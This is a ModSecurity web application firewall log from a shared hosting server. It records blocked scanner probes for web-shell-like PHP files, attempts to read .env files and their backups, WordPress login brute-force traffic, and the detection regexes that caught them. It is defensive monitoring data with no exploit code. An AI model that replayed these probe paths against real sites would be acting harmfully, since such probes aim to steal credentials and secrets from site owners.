[Tue May 26 14:46:51.048799 2026] [security2:error] [pid 648203:tid 648419] [client 20.12.190.196:55566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/zoo.php"] [unique_id "ahVlA7EQDDtxJNiDrdTMGQAAANs"]
[Tue May 26 14:46:51.048887 2026] [security2:error] [pid 648203:tid 648419] [client 20.12.190.196:55566] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/zoo.php"] [unique_id "ahVlA7EQDDtxJNiDrdTMGQAAANs"]
[Tue May 26 14:46:51.977927 2026] [security2:error] [pid 648203:tid 648355] [client 20.12.190.196:55627] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp-link-spm.php"] [unique_id "ahVlA7EQDDtxJNiDrdTMLgAAAJs"]
[Tue May 26 14:46:51.978063 2026] [security2:error] [pid 648203:tid 648355] [client 20.12.190.196:55627] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp-link-spm.php"] [unique_id "ahVlA7EQDDtxJNiDrdTMLgAAAJs"]
[Tue May 26 14:46:52.053247 2026] [security2:error] [pid 648203:tid 648440] [client 209.50.171.254:9695] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.171.50.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlA7EQDDtxJNiDrdTMJwAAAPA"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:52.436012 2026] [security2:error] [pid 648203:tid 648381] [client 20.12.190.196:55577] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp-link-snpm.php"] [unique_id "ahVlBLEQDDtxJNiDrdTMNAAAALU"]
[Tue May 26 14:46:52.436113 2026] [security2:error] [pid 648203:tid 648381] [client 20.12.190.196:55577] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp-link-snpm.php"] [unique_id "ahVlBLEQDDtxJNiDrdTMNAAAALU"]
[Tue May 26 14:46:52.870311 2026] [security2:error] [pid 648203:tid 648405] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlBLEQDDtxJNiDrdTMNgAAAM0"]
[Tue May 26 14:46:54.240048 2026] [security2:error] [pid 648203:tid 648335] [client 65.111.31.251:16931] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlBbEQDDtxJNiDrdTMWAAAAIc"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:54.965541 2026] [security2:error] [pid 648203:tid 648389] [client 20.12.190.196:55624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/xminie.php"] [unique_id "ahVlBrEQDDtxJNiDrdTMiwAAAL0"]
[Tue May 26 14:46:54.965688 2026] [security2:error] [pid 648203:tid 648389] [client 20.12.190.196:55624] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/xminie.php"] [unique_id "ahVlBrEQDDtxJNiDrdTMiwAAAL0"]
[Tue May 26 14:46:54.997112 2026] [security2:error] [pid 648203:tid 648421] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlBrEQDDtxJNiDrdTMgwAAAN0"]
[Tue May 26 14:46:55.070722 2026] [security2:error] [pid 648203:tid 648384] [client 66.249.64.42:44876] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlBrEQDDtxJNiDrdTMdwAAALg"], referer: https://mosykay.com/prizes/305300541
[Tue May 26 14:46:55.703153 2026] [security2:error] [pid 648203:tid 648439] [client 20.12.190.196:55591] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/bal.php"] [unique_id "ahVlB7EQDDtxJNiDrdTMrgAAAO8"]
[Tue May 26 14:46:55.703254 2026] [security2:error] [pid 648203:tid 648439] [client 20.12.190.196:55591] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/bal.php"] [unique_id "ahVlB7EQDDtxJNiDrdTMrgAAAO8"]
[Tue May 26 14:46:55.949249 2026] [security2:error] [pid 648203:tid 648438] [client 208.84.100.109:51944] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/backend/.env"] [unique_id "ahVlB7EQDDtxJNiDrdTMywAAAO4"]
[Tue May 26 14:46:55.949416 2026] [security2:error] [pid 648203:tid 648441] [client 208.84.100.109:51934] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/api/.env"] [unique_id "ahVlB7EQDDtxJNiDrdTMzAAAAPE"]
[Tue May 26 14:46:55.950535 2026] [security2:error] [pid 648203:tid 648426] [client 208.84.100.109:51932] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/app/.env"] [unique_id "ahVlB7EQDDtxJNiDrdTMzQAAAOI"]
[Tue May 26 14:46:55.953535 2026] [security2:error] [pid 648203:tid 648404] [client 208.84.100.109:51910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahVlB7EQDDtxJNiDrdTM0AAAAMw"]
[Tue May 26 14:46:56.488127 2026] [security2:error] [pid 648203:tid 648350] [client 216.26.225.4:20683] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlB7EQDDtxJNiDrdTMmAAAAJY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:57.240980 2026] [security2:error] [pid 648203:tid 648338] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlCLEQDDtxJNiDrdTM8wAAAIo"]
[Tue May 26 14:46:57.737505 2026] [security2:error] [pid 648203:tid 648372] [client 199.187.124.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlCbEQDDtxJNiDrdTNBgAAAKw"]
[Tue May 26 14:46:57.756256 2026] [security2:error] [pid 648203:tid 648392] [client 20.12.190.196:55655] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/drykl.php"] [unique_id "ahVlCbEQDDtxJNiDrdTNDAAAAMA"]
[Tue May 26 14:46:57.756369 2026] [security2:error] [pid 648203:tid 648392] [client 20.12.190.196:55655] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/drykl.php"] [unique_id "ahVlCbEQDDtxJNiDrdTNDAAAAMA"]
[Tue May 26 14:46:58.372435 2026] [security2:error] [pid 648203:tid 648414] [client 20.12.190.196:55609] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNGgAAANY"]
[Tue May 26 14:46:58.372563 2026] [security2:error] [pid 648203:tid 648414] [client 20.12.190.196:55609] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNGgAAANY"]
[Tue May 26 14:46:58.524277 2026] [security2:error] [pid 648203:tid 648277] [remote 195.178.110.199:43126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.koneksi.jhonweb.com"] [uri "/backend/.env"] [unique_id "ahVlCrEQDDtxJNiDrdTNIQAA40k"]
[Tue May 26 14:46:58.528434 2026] [security2:error] [pid 648203:tid 648278] [remote 195.178.110.199:43126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.koneksi.jhonweb.com"] [uri "/*update.cgi*"] [unique_id "ahVlCrEQDDtxJNiDrdTNJAAA40o"]
[Tue May 26 14:46:58.532254 2026] [security2:error] [pid 648203:tid 648282] [remote 195.178.110.199:43126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.koneksi.jhonweb.com"] [uri "/.env"] [unique_id "ahVlCrEQDDtxJNiDrdTNKQAA404"]
[Tue May 26 14:46:58.763929 2026] [security2:error] [pid 648203:tid 648404] [client 104.207.45.111:53759] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlCbEQDDtxJNiDrdTNCAAAAMw"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:59.215157 2026] [security2:error] [pid 648203:tid 648433] [client 85.204.70.106:46088] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "avprealty.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVlC7EQDDtxJNiDrdTNPAAAAOk"]
[Tue May 26 14:46:59.449297 2026] [security2:error] [pid 648203:tid 648369] [client 20.12.190.196:55647] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/11.php"] [unique_id "ahVlC7EQDDtxJNiDrdTNRQAAAKk"]
[Tue May 26 14:46:59.449397 2026] [security2:error] [pid 648203:tid 648369] [client 20.12.190.196:55647] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/11.php"] [unique_id "ahVlC7EQDDtxJNiDrdTNRQAAAKk"]
[Tue May 26 14:46:59.516202 2026] [security2:error] [pid 648203:tid 648362] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlC7EQDDtxJNiDrdTNOQAAAKI"]
[Tue May 26 14:46:59.588290 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNJwAA41A"]
[Tue May 26 14:46:59.591590 2026] [security2:error] [pid 648203:tid 648311] [remote 195.178.110.199:43126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.koneksi.jhonweb.com"] [uri "/.docker/.env"] [unique_id "ahVlCrEQDDtxJNiDrdTNSgAA42s"]
[Tue May 26 14:46:59.593421 2026] [security2:error] [pid 648203:tid 648299] [remote 195.178.110.199:43126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.koneksi.jhonweb.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVlCrEQDDtxJNiDrdTNTAAA418"]
[Tue May 26 14:46:59.599834 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNIgAA40Y"]
[Tue May 26 14:46:59.600266 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNIwAA408"]
[Tue May 26 14:46:59.601101 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNJQAA40k"]
[Tue May 26 14:46:59.732418 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNJgAA41g"]
[Tue May 26 14:46:59.732772 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNKgAA404"]
[Tue May 26 14:46:59.734168 2026] [security2:error] [pid 648203:tid 648306] [remote 195.178.110.199:43126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.koneksi.jhonweb.com"] [uri "/.env"] [unique_id "ahVlC7EQDDtxJNiDrdTNVAAA42Y"]
[Tue May 26 14:46:59.882814 2026] [security2:error] [pid 648203:tid 648309] [remote 195.178.110.199:43126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.koneksi.jhonweb.com"] [uri "/.env.backup"] [unique_id "ahVlC7EQDDtxJNiDrdTNWwAA42k"]
[Tue May 26 14:47:00.023412 2026] [security2:error] [pid 648203:tid 648297] [remote 195.178.110.199:43126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.koneksi.jhonweb.com"] [uri "/.env.bak"] [unique_id "ahVlDLEQDDtxJNiDrdTNXAAA410"]
[Tue May 26 14:47:00.026733 2026] [security2:error] [pid 648203:tid 648434] [client 85.204.70.106:46096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/xmlrpc.php"] [unique_id "ahVlC7EQDDtxJNiDrdTNWAAAAOo"]
[Tue May 26 14:47:00.400330 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNRwAA41w"]
[Tue May 26 14:47:00.441877 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlC7EQDDtxJNiDrdTNVgAA42c"]
[Tue May 26 14:47:00.442164 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNTQAA42s"]
[Tue May 26 14:47:00.771422 2026] [security2:error] [pid 648203:tid 648411] [client 20.12.190.196:55661] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/77.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNewAAANM"]
[Tue May 26 14:47:00.771532 2026] [security2:error] [pid 648203:tid 648411] [client 20.12.190.196:55661] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/77.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNewAAANM"]
[Tue May 26 14:47:00.981698 2026] [security2:error] [pid 648203:tid 648382] [client 104.167.25.217:54375] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlC7EQDDtxJNiDrdTNVwAAALY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:01.280956 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNXQAA42o"]
[Tue May 26 14:47:01.286483 2026] [security2:error] [pid 648203:tid 648295] [remote 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNSQAA41s"]
[Tue May 26 14:47:01.287455 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNYAAA420"]
[Tue May 26 14:47:01.291563 2026] [security2:error] [pid 648203:tid 648294] [remote 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNSAAA41o"]
[Tue May 26 14:47:01.293945 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlC7EQDDtxJNiDrdTNWgAA42g"]
[Tue May 26 14:47:01.296693 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNXgAA42w"]
